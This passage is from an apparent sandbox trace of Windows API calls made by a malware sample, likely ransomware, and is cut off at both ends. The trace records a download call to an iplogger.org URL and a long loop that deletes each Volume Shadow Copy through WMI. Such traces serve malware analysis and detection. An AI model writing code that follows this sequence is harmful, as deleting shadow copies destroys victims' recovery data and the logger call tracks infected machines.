(hModule=0x76c20000, lpProcName="QueueUserWorkItem") returned 0x76c4ca80 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedExchangeAdd") returned 0x76c4d39b [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0031.260] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0031.260] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0031.260] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardLayoutList") returned 0x74f62e69 [0031.260] GetProcAddress (hModule=0x74f40000, lpProcName="CharLowerW") returned 0x74f57647 [0031.260] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0031.260] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExA") returned 0x74d54907 [0031.260] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExA") returned 0x74d548ef [0031.260] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExA") returned 0x74d514b3 [0031.261] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0031.261] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyA") returned 0x74d4cd01 [0031.261] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0031.261] GetProcAddress (hModule=0x755e0000, lpProcName="CoSetProxyBlanket") returned 0x755f5ea5 [0031.261] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0031.261] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0031.261] GetProcAddress (hModule=0x75220000, lpProcName=0x8) returned 0x75223ed5 [0031.261] GetProcAddress (hModule=0x75220000, lpProcName=0x9) returned 0x75223eae [0031.261] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749e0000 [0031.427] GetProcAddress (hModule=0x749e0000, lpProcName="atexit") returned 0x749fc544 [0031.427] atexit (param_1=0x210920) returned 0 [0031.428] GetUserDefaultLangID () returned 0x409 [0031.429] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0031.429] GetProcessHeap () returned 0x4f10000 [0031.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x4f2f1c8 [0031.429] GetKeyboardLayoutList (in: nBuff=1, lpList=0x4f2f1c8 | out: lpList=0x4f2f1c8) returned 1 [0031.429] GetProcessHeap () returned 0x4f10000 [0031.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f2f1c8 | out: hHeap=0x4f10000) returned 1 [0031.430] URLDownloadToFileA (param_1=0x0, param_2="https://iplogger.org/1Zqq77", param_3="ntos.database" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntos.database"), param_4=0x0, param_5=0x0) returned 0x800c0008 [0039.549] CoCreateInstance (in: rclsid=0x40c220*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x40c180*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x17e43c | out: ppv=0x17e43c*=0x827c660) returned 0x0 [0040.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0040.166] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0040.166] GetCurrentProcess () returned 0xffffffff [0040.166] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x17e434 | out: Wow64Process=0x17e434) returned 1 [0040.166] WbemContext:IWbemContext:SetValue (This=0x827c660, wszName="__ProviderArchitecture", lFlags=0, pValue=0x17e420*(varType=0x3, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x40, varVal2=0x76c314dc)) returned 0x0 [0040.166] CoCreateInstance (in: rclsid=0x40c210*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x40c140*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x17e430 | out: ppv=0x17e430*=0x827c730) returned 0x0 [0040.256] WbemLocator:IWbemLocator:ConnectServer (in: This=0x827c730, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x827c660, ppNamespace=0x17e440 | out: ppNamespace=0x17e440*=0x827cfdc) returned 0x0 [0041.773] CoSetProxyBlanket (pProxy=0x827cfdc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0041.774] IWbemServices:ExecQuery (in: This=0x827cfdc, strQueryLanguage="", strQuery="", lFlags=48, pCtx=0x0, ppEnum=0x17e438 | out: ppEnum=0x17e438*=0x827d07c) returned 0x0 [0041.791] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0043.635] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x40, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0043.635] lstrlenW (lpString="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}") returned 38 [0043.635] GetProcessHeap () returned 0x4f10000 [0043.635] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0043.635] lstrlenW (lpString="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}") returned 38 [0043.635] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 60 [0043.637] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0044.985] GetProcessHeap () returned 0x4f10000 [0044.985] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0044.985] IUnknown:Release (This=0x827d0b8) returned 0x0 [0044.986] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0044.988] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4fc931c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{43A11862-374F-4B42-8013-C8A59B8690F4}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0044.988] lstrlenW (lpString="{43A11862-374F-4B42-8013-C8A59B8690F4}") returned 38 [0044.988] GetProcessHeap () returned 0x4f10000 [0044.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0044.988] lstrlenW (lpString="{43A11862-374F-4B42-8013-C8A59B8690F4}") returned 38 [0044.988] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 60 [0044.988] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0045.903] GetProcessHeap () returned 0x4f10000 [0045.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0045.903] IUnknown:Release (This=0x827d0b8) returned 0x0 [0045.903] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0045.904] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{84D74FA3-DE98-47B0-806B-7C5805D67A02}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0045.904] lstrlenW (lpString="{84D74FA3-DE98-47B0-806B-7C5805D67A02}") returned 38 [0045.904] GetProcessHeap () returned 0x4f10000 [0045.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0045.904] lstrlenW (lpString="{84D74FA3-DE98-47B0-806B-7C5805D67A02}") returned 38 [0045.904] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 60 [0045.905] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0046.749] GetProcessHeap () returned 0x4f10000 [0046.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0046.750] IUnknown:Release (This=0x827d0b8) returned 0x0 [0046.750] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0046.751] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{1D028705-A254-45DE-BE10-D22FA08DBB3A}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0046.751] lstrlenW (lpString="{1D028705-A254-45DE-BE10-D22FA08DBB3A}") returned 38 [0046.751] GetProcessHeap () returned 0x4f10000 [0046.751] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0046.751] lstrlenW (lpString="{1D028705-A254-45DE-BE10-D22FA08DBB3A}") returned 38 [0046.751] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 60 [0046.751] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0047.497] GetProcessHeap () returned 0x4f10000 [0047.497] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0047.497] IUnknown:Release (This=0x827d0b8) returned 0x0 [0047.497] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0047.498] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{51FFEAE1-0810-4889-92A9-E72417EBFA41}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0047.498] lstrlenW (lpString="{51FFEAE1-0810-4889-92A9-E72417EBFA41}") returned 38 [0047.498] GetProcessHeap () returned 0x4f10000 [0047.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0047.498] lstrlenW (lpString="{51FFEAE1-0810-4889-92A9-E72417EBFA41}") returned 38 [0047.498] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 60 [0047.498] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0048.288] GetProcessHeap () returned 0x4f10000 [0048.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0048.288] IUnknown:Release (This=0x827d0b8) returned 0x0 [0048.288] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0048.291] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0048.291] lstrlenW (lpString="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}") returned 38 [0048.291] GetProcessHeap () returned 0x4f10000 [0048.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0048.291] lstrlenW (lpString="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}") returned 38 [0048.292] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 60 [0048.292] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0049.101] GetProcessHeap () returned 0x4f10000 [0049.101] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0049.101] IUnknown:Release (This=0x827d0b8) returned 0x0 [0049.101] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0049.102] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0049.102] lstrlenW (lpString="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}") returned 38 [0049.102] GetProcessHeap () returned 0x4f10000 [0049.102] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0049.102] lstrlenW (lpString="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}") returned 38 [0049.102] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 60 [0049.102] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0049.922] GetProcessHeap () returned 0x4f10000 [0049.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0049.922] IUnknown:Release (This=0x827d0b8) returned 0x0 [0049.922] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0049.924] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{05121166-67F2-4EA9-83D8-EDC08F680DA7}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0049.924] lstrlenW (lpString="{05121166-67F2-4EA9-83D8-EDC08F680DA7}") returned 38 [0049.924] GetProcessHeap () returned 0x4f10000 [0049.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0049.924] lstrlenW (lpString="{05121166-67F2-4EA9-83D8-EDC08F680DA7}") returned 38 [0049.924] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 60 [0049.924] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0050.804] GetProcessHeap () returned 0x4f10000 [0050.804] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0050.804] IUnknown:Release (This=0x827d0b8) returned 0x0 [0050.804] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0050.805] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0050.805] lstrlenW (lpString="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}") returned 38 [0050.805] GetProcessHeap () returned 0x4f10000 [0050.805] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0050.806] lstrlenW (lpString="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}") returned 38 [0050.806] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 60 [0050.806] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0051.505] GetProcessHeap () returned 0x4f10000 [0051.505] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0051.505] IUnknown:Release (This=0x827d0b8) returned 0x0 [0051.505] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0051.506] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{7199C78C-6563-4398-B813-4A3F86995AEC}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0051.506] lstrlenW (lpString="{7199C78C-6563-4398-B813-4A3F86995AEC}") returned 38 [0051.506] GetProcessHeap () returned 0x4f10000 [0051.507] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0051.507] lstrlenW (lpString="{7199C78C-6563-4398-B813-4A3F86995AEC}") returned 38 [0051.507] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 60 [0051.507] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0052.242] GetProcessHeap () returned 0x4f10000 [0052.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0052.242] IUnknown:Release (This=0x827d0b8) returned 0x0 [0052.242] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0052.243] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{0F63D180-8A8A-41CF-8B3E-2852647AB192}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0052.243] lstrlenW (lpString="{0F63D180-8A8A-41CF-8B3E-2852647AB192}") returned 38 [0052.243] GetProcessHeap () returned 0x4f10000 [0052.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0052.243] lstrlenW (lpString="{0F63D180-8A8A-41CF-8B3E-2852647AB192}") returned 38 [0052.243] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 60 [0052.243] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0052.935] GetProcessHeap () returned 0x4f10000 [0052.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0052.935] IUnknown:Release (This=0x827d0b8) returned 0x0 [0052.935] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0052.937] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f6fca4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0052.937] lstrlenW (lpString="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}") returned 38 [0052.937] GetProcessHeap () returned 0x4f10000 [0052.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f6fc18 [0052.937] lstrlenW (lpString="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}") returned 38 [0052.937] wnsprintfW (in: pszDest=0x4f6fc18, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 60 [0052.937] IWbemServices:DeleteInstance (in: This=0x827cfdc, strObjectPath="Win32_ShadowCopy.ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'", lFlags=0, pCtx=0x827c660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0053.654] GetProcessHeap () returned 0x4f10000 [0053.654] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f6fc18 | out: hHeap=0x4f10000) returned 1 [0053.654] IUnknown:Release (This=0x827d0b8) returned 0x0 [0053.654] IEnumWbemClassObject:Next (in: This=0x827d07c, lTimeout=-1, uCount=0x1, apObjects=0x17e434, puReturned=0x17e444 | out: apObjects=0x17e434*=0x827d0b8, puReturned=0x17e444*=0x1) returned 0x0 [0053.655] IWbemClassObject:Get (in: This=0x827d0b8, wszName="id", lFlags=0, pVal=0x17e420*(varType=0x0, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1=0x4f70744, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e420*(varType=0x8, wReserved1=0x76c3, wReserved2=0xf1c0, wReserved3=0x4f2, varVal1="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}", 